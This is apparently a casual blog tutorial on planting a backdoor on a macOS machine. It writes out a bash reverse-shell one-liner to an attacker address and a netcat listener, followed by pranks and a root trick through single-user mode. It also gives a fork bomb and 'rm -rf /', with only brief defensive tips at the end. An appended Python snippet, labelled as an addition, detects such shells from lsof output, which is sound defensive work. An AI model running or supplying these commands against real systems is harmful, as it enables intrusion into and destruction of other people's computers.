Hello, ladies and gents! Today I will be discussing the fun and excitement of a backdoor on an OSX system.
Note: A lot of what I am going to say is directly based off of this article by Patrick Mosca. Please give him your gratitude and leave mine at the door!
Step 1: Reverse Shell
A reverse shell is the first step to our backdoor on the OSX system.
The reverse shell makes the target computer initiate the connection to us, instead of us connecting to it.
We can create a reverse shell with a simple one-line command on our target system. (Yes, sadly this has to be done on the target system.)
bash -i >& /dev/tcp/youripaddress/1337 0>&1
Fantastic! Your reverse shell has been created. If we want to gain root access, we can use our Swiss Army knife of penetration testing tools, netcat.
On Kali Linux, type:
nc -l -p 1337
If you are using an OSX system for penetration testing (for some reason), type this:
nc -l 1337
If you did everything correctly, you should see a command line prompt similar to the following:
bash-3.2$
Step 2: Test Your Door
Let's make sure our backdoor has working hinges and a working doorknob. Don't think too hard about what I just said; that was a joke.
Here are some fun things you can do with your backdoor:
1. Make the victim computer talk.
This is probably the easiest and funniest trick in the book. Just type:
"say (Whatever you want the computer to say)"
If the volume is turned down on the victim computer, no words will be heard. To fix this, turn the volume all the way up!
"osascript -e 'set volume 7'"
2. Open links.
That's right. Remember that fantasy you had where you were a top-notch hacker and you opened a thousand links of nyan cat on a government computer?
Well, you can do the same thing here, but instead of a government computer it would be a computer that you have permission to execute attacks on. (You evil little thing).
Simply type:
"open (link)"
Note: Your link MUST start with http://www. for this to work.
3. Navigate to directories
This one is probably going to be the most useful to know.
"ls" lists all of the files and folders contained in a directory.
"cd" opens a folder or directory.
4. Deadly commands
Here I will talk briefly about some serious "do not try at home" commands.
I am not responsible for anything idiotic you do.
Note: Some, if not most, of these commands require root permissions. If you would like the backdoor to have root access, then run this reverse shell command in single user mode. To launch in single user mode, start the victim computer whilst holding Command-S.
Fork Bomb:
A fork bomb is a process that replicates itself endlessly until the computer crashes.
A fork bomb is made by typing:
:(){ :|:& };:
Note: I am not sure that this works on a Mac. Don't test it out, though. Seriously.
Erase EVERYTHING:
Okay no explanation needed:
rm -rf /
Step 3: Conclusion
Everyone run! The cyber revolution has taken over! Destroy the computers!
Just kidding.
The one main flaw in this attack is the fact that the target system has to execute a command first. So, there is a simple "patch".
- Don't give your computer to strangers
- Don't leave your computer out in the open
- Don't run commands that you don't understand
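A defensive check to go with this list, as an added example (not from the original post or from Patrick Mosca's article): the reverse shell from Step 1 leaves a shell whose standard input, output and error all point at one TCP socket, and the Python below flags that pattern in `lsof -nP -iTCP` output. The sample lines, addresses, PIDs and the function name are constructed for illustration.

```python
import re
from collections import defaultdict

SHELLS = {"bash", "sh", "zsh", "ksh", "dash"}

# Constructed sample in the default column layout of `lsof -nP -iTCP`
# (addresses, PIDs and user names are made up for this example).
SAMPLE_LSOF = """\
COMMAND   PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
bash     4242 alice    0u  IPv4 0xa1b2      0t0  TCP 192.168.1.20:49512->192.168.1.10:1337 (ESTABLISHED)
bash     4242 alice    1u  IPv4 0xa1b2      0t0  TCP 192.168.1.20:49512->192.168.1.10:1337 (ESTABLISHED)
bash     4242 alice    2u  IPv4 0xa1b2      0t0  TCP 192.168.1.20:49512->192.168.1.10:1337 (ESTABLISHED)
sshd      310 root     3u  IPv4 0xc3d4      0t0  TCP *:22 (LISTEN)
Safari    911 alice   25u  IPv4 0xe5f6      0t0  TCP 192.168.1.20:49600->203.0.113.5:443 (ESTABLISHED)
bash     5000 alice    3u  IPv4 0xf7a8      0t0  TCP 192.168.1.20:49700->203.0.113.9:80 (ESTABLISHED)
"""

def find_socket_backed_shells(lsof_text):
    """Return [(pid, command, remote)] for shells whose fds 0, 1 and 2 share one TCP peer."""
    fds = defaultdict(dict)  # (pid, command) -> {fd number: remote endpoint}
    for line in lsof_text.splitlines():
        cols = line.split()
        # Keep only TCP rows that belong to a shell process (the header row fails this too).
        if len(cols) < 9 or cols[0] not in SHELLS or cols[7] != "TCP":
            continue
        fd = re.match(r"(\d+)", cols[3])       # "0u" -> 0; access-mode letter is ignored
        if not fd or "->" not in cols[8]:      # listening sockets have no remote side
            continue
        fds[(int(cols[1]), cols[0])][int(fd.group(1))] = cols[8].split("->", 1)[1]
    hits = []
    for (pid, cmd), table in sorted(fds.items()):
        remotes = {table.get(n) for n in (0, 1, 2)}
        # A normal interactive shell has a terminal on 0/1/2, not a network socket.
        if None not in remotes and len(remotes) == 1:
            hits.append((pid, cmd, remotes.pop()))
    return hits

if __name__ == "__main__":
    for pid, cmd, remote in find_socket_backed_shells(SAMPLE_LSOF):
        print(f"ALERT pid={pid} cmd={cmd} stdio attached to {remote}")
```

The redirection never appears in the process arguments (the process list shows only `bash -i`), which is why the check looks at open file descriptors instead of command lines.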
I hope you enjoyed this tutorial! As always, leave any questions or disagreements in the comment section!
-- Cameron